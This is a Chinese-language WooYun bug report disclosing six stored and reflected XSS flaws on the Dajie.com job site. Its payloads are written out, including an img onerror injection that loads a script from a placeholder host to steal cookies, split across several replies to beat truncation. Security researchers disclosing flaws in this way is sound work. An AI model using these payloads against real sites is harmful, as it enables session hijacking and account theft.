WooYun.org

一个月前看到某人提交了大街网sql注入，于是随便逛了下，发现不少xss,今天闲下来了就顺手提交了。。
1.个人动态中显示回答别人问题的回复内容没有过滤
当我们在问题首页中随便找一个问题回复时，对敏感字符进行测试，如下图所示：

我们回到个人首页看到个人动态界面如下图所示：

在这里没有对'"<>等敏感字符过滤，于是我们可以构造一下，因为我发现在回答别人问题的回复内容中如果有闭合的script标签就会被移除掉，只有利用其它标签构造出如下内容

"><img src="#" onerror="document.body.appendChild(createElement('script')).src='http://xxx'"

结果发现在自己搭建的xss平台那边并没有收到cookie,我们来看一下个人动态中回复对应的源码

原来字符超过了一定的字数会用省略号代替，于是使用拼接的方法，回复问题几条内容后，全部在个人动态中显示，几条回复组合成功打洞，并在xss平台成功收到cookie，如下图所示：

2.在校园招聘->求职意愿页面中的“屏蔽这些职位”这个文本框没有进行过滤，如下图所示

在该文本框中输入"><img src="#" onerror="alert(1)",效果如下图所示：

3.好友人脉中“他的联系人”中有很多朋友的名片，名片中有近期共享，这里存在xss,通过查看近期共享我们能发现一些端倪
经测试，我们自己分享一个内容如下：

"><img onmouseover="alert(1)"

到好友人脉中->他的联系人这个页面我们能看到如下效果：

4.在校园招聘->应届生项目中的搜索存在反射型xss,不过有点奇怪的是需要通过移动输入焦点来触发xss,看图：

5.在个人首页右上角的搜索存在反射型xss，也是需要通过移动输入焦点来触发xss,效果与第四个xss一样
6.在问答搜索里面也存在反射型xss,不过与前两个反射型xss不同的是，这个xss通过输入以下内容

"><img src="#" onerror="alert(1)"

然后点击搜索按钮便触发xss,尼玛现在无法进入问答搜索页面估计在维护，后续补上图片